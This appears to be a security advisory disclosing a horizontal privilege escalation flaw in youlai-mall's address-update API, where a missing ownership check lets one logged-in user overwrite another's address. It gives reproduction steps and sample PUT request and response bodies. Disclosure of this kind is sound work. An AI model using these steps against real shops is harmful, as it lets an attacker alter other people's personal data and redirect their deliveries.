The youlai-mall application has an improper access control vulnerability that allows unauthorized users to update other users’ addresses.

[Hwwg]

Contributors: Huang Weigang

1. Vulnerability Impact

youlai-mall (latest)
https://github.com/youlaitech/youlai-mall

2. Vulnerability Location

PUT /mall-ums/app-api/v1/addresses/{addressId}

3. Code Analysis

First, the API accepts addressid as the parameter.

Furthermore, in the subsequent implementation code the system directly uses addressId to update the address data, but there is no check to verify that this data belongs to the currently logged-in user.

Vulnerability Reproduction

• Log in as User A and obtain a valid Authorization token.
• Intercept the address update request: PUT /mall-ums/app-api/v1/addresses/{addressId} .
• Modify the path parameter addressId to an ID that belongs to User B and set the JSON body field id to the same User B address ID (the service uses the body id for updateById ).
• Change any fields (e.g., consigneeName , consigneeMobile , province , city , area , detailAddress , defaulted ) to new values.
• Send the modified request using User A’s token.
• Observe a 200 OK response and verify that User B’s address record is updated, confirming horizontal privilege escalation.

USER-A: {
"request_data": {
"method": "PUT",
"url": "http://10.15.196.160:9999/mall-ums/app-api/v1/addresses/1",
"json": {
"id": 218,
"consigneeName": "郝先瑞",
"consigneeMobile": "18866668888",
"province": "上海",
"city": "上海市",
"area": "浦东新区",
"detailAddress": "1111",
"defaulted": 0
},
"params": {},
"data": {},
"files": {}
},
"response_data": {
"code": "00000",
"data": null,
"msg": "一切ok"
}
},
USER-B
"test": {
"request_data": {
"method": "PUT",
"url": "http://10.15.196.160:9999/mall-ums/app-api/v1/addresses/1",
"json": {
"id": 218,
"consigneeName": "郝先瑞",
"consigneeMobile": "18866668888",
"province": "上海",
"city": "上海市",
"area": "浦东新区",
"detailAddress": "1111",
"defaulted": 0
},
"params": {},
"data": {},
"files": {}
},
"response_data": {
"code": "00000",
"data": null,
"msg": "一切ok"
}
}
}
},

4. Impact Description

• Enables unauthorized modification of another user’s address data by a different authenticated user.
• Breaks access control due to missing ownership validation and ignoring the path addressId in favor of the user-controlled body id .
• Causes privacy and integrity issues (altering PII and delivery details), potentially redirecting shipments or enabling fraud/social engineering.
• If defaulted=1 is set, the service incorrectly toggles User A’s other default addresses to non-default, creating cross-account data inconsistencies.
• If address IDs are predictable or enumerable, the blast radius extends to any user’s address, increasing systemic risk and potential regulatory noncompliance.